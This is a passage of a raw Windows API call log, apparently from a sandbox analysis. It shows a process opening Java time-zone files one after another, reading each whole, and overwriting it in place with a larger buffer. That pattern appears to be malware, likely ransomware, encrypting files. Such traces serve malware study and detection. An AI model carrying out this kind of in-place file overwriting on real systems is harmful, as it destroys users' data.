lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.277] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4d [0129.277] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.277] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.277] ReleaseMutex (hMutex=0x168) returned 1 [0129.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Antigua", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Antigua", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Antigua", lpUsedDefaultChar=0x0) returned 7 [0129.278] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fd08, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd08*, lpNumberOfBytesRead=0x331f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0129.279] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.279] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0129.279] CloseHandle (hObject=0x1cc) returned 1 [0129.280] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.281] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x225 [0129.282] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.282] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.282] ReleaseMutex (hMutex=0x168) returned 1 [0129.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rio_Gallegos", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rio_Gallegos", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rio_Gallegos", lpUsedDefaultChar=0x0) returned 12 [0129.282] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x225, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x331f2bc*=0x225, lpOverlapped=0x0) returned 1 [0129.283] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.283] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7ad, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x331f2d0*=0x7ad, lpOverlapped=0x0) returned 1 [0129.283] CloseHandle (hObject=0x1cc) returned 1 [0129.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\atikokan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.284] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.284] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5d [0129.285] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.285] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.285] ReleaseMutex (hMutex=0x168) returned 1 [0129.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Atikokan", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Atikokan", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Atikokan", lpUsedDefaultChar=0x0) returned 8 [0129.285] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f56778, nNumberOfBytesToRead=0x5d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56778*, lpNumberOfBytesRead=0x331f2bc*=0x5d, lpOverlapped=0x0) returned 1 [0129.286] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.286] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5e5, lpOverlapped=0x0) returned 1 [0129.286] CloseHandle (hObject=0x1cc) returned 1 [0129.287] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.287] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.287] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x59 [0129.288] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.288] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.288] ReleaseMutex (hMutex=0x168) returned 1 [0129.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bogota", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bogota", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bogota", lpUsedDefaultChar=0x0) returned 6 [0129.288] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x331f2bc*=0x59, lpOverlapped=0x0) returned 1 [0129.289] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.289] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0129.289] CloseHandle (hObject=0x1cc) returned 1 [0129.290] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.291] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.291] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7a8 [0129.291] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.291] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.292] ReleaseMutex (hMutex=0x168) returned 1 [0129.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chicago", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chicago", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chicago", lpUsedDefaultChar=0x0) returned 7 [0129.292] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x7a8, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x331f2bc*=0x7a8, lpOverlapped=0x0) returned 1 [0129.294] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.294] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x331f2d0*=0xd30, lpOverlapped=0x0) returned 1 [0129.294] CloseHandle (hObject=0x1cc) returned 1 [0129.294] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.295] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.295] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1fd [0129.295] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.295] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.295] ReleaseMutex (hMutex=0x168) returned 1 [0129.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dawson_Creek", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dawson_Creek", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dawson_Creek", lpUsedDefaultChar=0x0) returned 12 [0129.296] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1fd, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x331f2bc*=0x1fd, lpOverlapped=0x0) returned 1 [0129.297] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.297] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x785, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x331f2d0*=0x785, lpOverlapped=0x0) returned 1 [0129.297] CloseHandle (hObject=0x1cc) returned 1 [0129.297] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.298] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.298] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4b4 [0129.298] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.299] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.299] ReleaseMutex (hMutex=0x168) returned 1 [0129.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glace_Bay", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Glace_Bay", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Glace_Bay", lpUsedDefaultChar=0x0) returned 9 [0129.299] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x4b4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x331f2bc*=0x4b4, lpOverlapped=0x0) returned 1 [0129.301] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.301] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa3c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x331f2d0*=0xa3c, lpOverlapped=0x0) returned 1 [0129.301] CloseHandle (hObject=0x1cc) returned 1 [0129.302] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.302] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.302] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x59 [0129.303] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.303] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.303] ReleaseMutex (hMutex=0x168) returned 1 [0129.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guyana", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guyana", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Guyana", lpUsedDefaultChar=0x0) returned 6 [0129.303] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x331f2bc*=0x59, lpOverlapped=0x0) returned 1 [0129.304] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.304] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0129.304] CloseHandle (hObject=0x1cc) returned 1 [0129.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.305] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.306] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x374 [0129.306] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0129.306] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.306] ReleaseMutex (hMutex=0x168) returned 1 [0129.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tell_City", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tell_City", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tell_City", lpUsedDefaultChar=0x0) returned 9 [0129.306] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x374, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x331f2bc*=0x374, lpOverlapped=0x0) returned 1 [0130.624] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0130.624] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x8fc, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x331f2d0*=0x8fc, lpOverlapped=0x0) returned 1 [0130.624] CloseHandle (hObject=0x1cc) returned 1 [0130.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0130.649] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0130.649] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5dc [0130.649] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0130.649] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.649] ReleaseMutex (hMutex=0x168) returned 1 [0130.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Louisville", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Louisville", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Louisville", lpUsedDefaultChar=0x0) returned 10 [0130.649] ReadFile (in: hFile=0x1cc, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x5dc, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x331f2bc*=0x5dc, lpOverlapped=0x0) returned 1 [0131.479] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0131.480] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xb64, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f2d0*=0xb64, lpOverlapped=0x0) returned 1 [0131.480] CloseHandle (hObject=0x1cc) returned 1 [0131.481] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0131.482] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.482] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x59 [0131.482] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.482] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.482] ReleaseMutex (hMutex=0x168) returned 1 [0131.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Martinique", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Martinique", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Martinique", lpUsedDefaultChar=0x0) returned 10 [0131.483] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x331f2bc*=0x59, lpOverlapped=0x0) returned 1 [0131.484] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0131.484] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0131.485] CloseHandle (hObject=0x1cc) returned 1 [0131.485] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 